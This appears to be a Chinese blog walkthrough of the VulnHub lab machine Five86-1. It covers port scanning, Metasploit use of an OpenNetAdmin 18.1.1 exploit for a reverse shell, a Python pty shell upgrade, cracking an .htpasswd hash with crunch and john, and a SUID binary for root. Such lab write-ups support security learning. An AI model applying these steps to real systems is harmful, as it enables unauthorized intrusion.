vulnhub靶机Five86-1——新手进阶1

最新推荐文章于 2024-04-06 06:47:07 发布
最新推荐文章于 2024-04-06 06:47:07 发布
阅读量1.3k 收藏 45
点赞数 31
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75051044/article/details/135768857
版权

环境准备

攻击机:kali

靶机:Five86-1

靶机地址:https://www.vulnhub.com/entry/five86-1,417/
 

实验目的:获取flag

信息收集

打开靶机和kali虚拟机,将靶机的网络连接改为NAT模式,用nmap扫描靶机ip,得知ip为192.168.2.33

namp -sP 192.168.2.128/24

获取靶机开放端口

masscan 192.168.233 -p 0-65535 --rate 100000

扫描开放端口详细信息

nmap -T4 -sV -A -o -p 22,80,10000 192.168.2.33

打开浏览器进入80端口,http://192.168.2.33,并用Wappalyzer查看网页,没有扫描发现

查看10000端口,192.168.2.33:10000

发现提示,进入http://192.168.2.33:10000,发现登录页面

尝试输入admin,密码123456(随便试一下),没什么发现,爆破密码花费时间久,所以尝试一下其他的方法

尝试web网站目录爆破工具Dirb

看一下网页的robot.txt,可以知道网站的作者希望所有爬虫都不访问文件目录/ona的内容,所以肯定有重要的内容

进入192.168.2.33/ona

漏洞利用

这个页面的信息还是比较多的,不过我看了一下,作者英文不好,没发现什么有用的,所以打算找一下网页的漏洞,网页的名字和版本,searchsploit OpenNetAdmin 18.1.1

直接到https://www.exploit-db.com/漏洞库查找,找到对应的漏洞文件下载下来,把文件放入/usr/share/metasploit-framework/modules/exploits/unix/文件夹,进入msf,进行以下操作

exploit/47772

set rhosts 192.168.2.33

set lhost 192.168.2.128(主机ip)

exploit

成功进入目标webshell,输入命令发现无法执行,ls以下查看文件

提权

使用python切换至交互式shell

shell
python -c 'import pty;pty.spawn("/bin/bash")'

 查看根目录,有个html文件,查看,有reports,查看,发现隐文件.htpasswd,查看文件

 发现用户和密码

提示密码10位数且只有aefhrt这些字符,用crunch创建密码字典mima.txt,桌面创建user.txt里保存douglas的用户密码

所以john爆破密码

进入douglas用户

查看根目录

经过以下步骤,进入jen用户

查看邮件内容,知道Moss的密码,进入Moss用户

 

利用suid命令,找到moss目录下的文件,进行访问

访问后发现一个root权限的二进制文件upyourgame,执行,就获取到了root权限 找到flag.txt

 

m0_75051044
关注
  • 31
    点赞
  • 45
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
vulnhub靶机Five86-1渗透笔记
liver100day的博客
09-07 1240
文章目录1.环境搭建2.主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机:sick0s1.1 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/sickos-11,132/ 2.主机发现 3.漏洞利用 4.提权 5.总结 ...
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记_vulnhub入门靶场
最新发布
m0_60634927的博客
04-06 989
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
Vulnhub靶机:DC-1渗透——新手3
m0_75051044的博客
03-19 246
攻击机:kali靶机Vulnhub靶机:DC-1靶机下载:DC: 1 ~ VulnHub靶机描述里说明有5个flag在VMware中打开靶机,将虚拟机网络适配器改为NAT确定靶机ip 信息收集/服务确认,用namp扫描 利用MSF确定漏洞,攻击,入metepreter提权 查找flag1.txt查找flag2,根据flag1的提示,入settings.php文件数据库账号和密码入数据库查看数据库入drupaldb库中查看库中的表 查看表中内容,可以看到admin的密码给加密了S SSD应
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2451
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机:DC-4暴力破解——新手4
m0_75051044的博客
03-22 1279
本次实验使用了两种破解admin用户密码的方式,明显使用hydra更快,使用brupsuite要对字典commompw.txt中7000多个密码行暴力破解,时间太长了,所以直接用hydra爆破出来的密码登录,再用bruqsuite行抓包更改命令,最后获取密码字典,然后接着用hydra爆破。显然还是不用bruqsuite更好。使用了两种提权方式,第一种:添加一个无密码用户,并使用teehee执行写入 passwd中,第二种:通过定时任务执行脚本提权。对比一下第一种提权更快。
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
66.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)1
08-03
声明:本人坚决反对利用教学方法行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地行防护。第1页 共25页
靶机hackNos Os-Bytesec练习报告1
08-08
id=1yBuih2CsBx45oTUDpFr4JldrzkaOTTeZ https://download.vulnhub.com/hacknos/Os-Byt
VulnHub 靶机系列实战教程.pdf
07-22
VulnHub 靶机系列实战教程.pdf
65.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)1
08-03
声明:本人坚决反对利用教学方法行犯罪的行为,一切犯罪行为必将受到严惩,绿色网络需要我们共同维护,更推荐大家了解它们背后的原理,更好地行防护。前文学习:[网络
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值